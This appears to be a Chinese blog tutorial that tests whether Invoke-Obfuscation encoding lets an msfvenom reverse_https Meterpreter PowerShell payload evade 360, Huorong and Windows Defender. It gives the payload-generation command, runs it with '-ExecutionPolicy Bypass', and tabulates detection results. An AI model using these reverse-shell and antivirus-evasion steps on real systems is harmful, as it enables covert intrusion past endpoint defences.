Invoke-Obfuscation
下载地址:
https://github.com/danielbohannon/Invoke-Obfuscation
Invoke-Obfuscation是一款混淆工具,具体信息可自行百度学习。
参考文档
https://blog.csdn.net/weixin_44216796/article/details/112723993
先说下结果:
Invoke-Obfuscation
的Encoding
部分方法混淆可以过360和火绒,但是过不了Windows Defender
1. 模块使用
导入模块
Import-Module C:\0_poweshell\Invoke-Obfuscation-master\Invoke-Obfuscation.psd1
这里注意,一定要写上完整路径,不然会报错
加载模块
Invoke-Obfuscation
支持的加密方法:
TOKEN
支持分部分混淆STRING
整条命令混淆COMPRESS
将命令转为单行并压缩,ENCODING
编码LAUNCHER
选择执行方式
本文只讨论ENCODING
编码方法
2. msfvenom下msf上线
首先用msfvenom
生成一个ps1文件
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.211.55.2 LPORT=4444 -f psh-reflection > msf-crow.ps1
然后设置监听:
然后回到win10
2.1 360
直接在有360的环境下进行执行(这里不做云查杀和杀毒的操作)
PowerShell.exe -ExecutionPolicy Bypass -File .\msf-crow.ps1
上线成功。
这里来一次查杀,首先使用按位置查杀
报毒,直接在这个位置关闭,不处理
再运行一次,此时360提示有毒。
2.2 Windows defender
复制到Windows sever2019
下,Windows Defender
直接杀掉,很干脆
2.3 火绒
关掉Windows Defender
直接使用火绒
扫描,没扫描到。
上线试试:
直接就上线了!!!
2.4 总结
因此在此可以进行如下总结:
msfvenom
最新版(2021-05-28安装)生成powershell
攻击脚本在静态下的查杀效果:
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
未测 |
❌ |
未测 |
windows server 2019 64位 |
✔️ |
未测 |
❌ |
ps:以上环境都在联网状态下
同样
msfvenom
最新版(2021-05-28安装)生成powershell
攻击脚本在动态执行上线的查杀效果:
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
未测 |
❌ |
未测 |
windows server 2019 64位 |
✔️ |
未测 |
❌ |
ps:以上环境都联网,且均在cmd
中执行-ExecutionPolicy Bypass
来绕过执行安全策略进行上线。
这里可以看到,360在第一次并不拦截,而且还可以上线,这可能由于我用的是虚拟机,如果是实体机的话,应该会被杀。
3. 混淆大法
设置需要混淆的木马文件路径
set scriptpath C:\0_poweshell\msf-crow.ps1
4. 第一种混淆 1
encoding
选择第一种方法混淆
1
将文件输出的out 1.ps1
文件路径:
C:\0_poweshell\Invoke-Obfuscation-master\1.ps1
攻击机开启监听模式:
上线测试:
4.1 360
在360
环境下直接运行(生成之后没有杀毒扫描)
PowerShell.exe -ExecutionPolicy Bypass -File C:\0_poweshell\Invoke-Obfuscation-master\1.ps1
这里是在cmd
命令行下执行PowerShell
命令的
-ExecutionPolicy Bypass
:绕过执行安全策略,在默认情况下,PowerShell
的安全策略规定了PowerShell
不允许运行命令和文件。通过设置这个参数,可以绕过任意一个安全保护规则。在渗透测试中,基本每一次运行PowerShel
l脚本时都要使用这个参数。
(参考:https://blog.csdn.net/Eastmount/article/details/115503946)
360下上线成功
但使用360云查杀之后显示报毒:
4.2 windows Defender
windows Defender
直接静态被杀
4.3 火绒
火绒,静态扫描报毒
动态上线失败
4.4 总结
静态查杀
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
未测 |
❌ |
未测 |
windows server 2019 64位 |
❌ |
未测 |
❌ |
全挂。。。
5. 第2种混淆 2
这里先静态测试下
5.1 火绒
火绒直接报毒
5.2 360
360云查杀,正常
5.3 Windows Defender
正常
静态查杀能力:
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
未测 |
✔️ |
未测 |
windows server 2019 64位 |
❌ |
未测 |
✔️ |
动态上线能力:
PowerShell.exe -ExecutionPolicy Bypass -File C:\0_poweshell\Invoke-Obfuscation-master\2.ps1
火绒:
静态查杀,动态上线失败
windf:
静态查杀正常,动态上线失败
360:
动态上线失败,而且清除了木马,因此这里360也是静动均查杀了木马
此时对其进行重新调整如下表
5.4 总结
静态查杀能力:
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
未测 |
❌ |
未测 |
windows server 2019 64位 |
❌ |
未测 |
✔️ |
动态上线:
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
未测 |
❌ |
未测 |
windows server 2019 64位 |
❌ |
未测 |
❌ |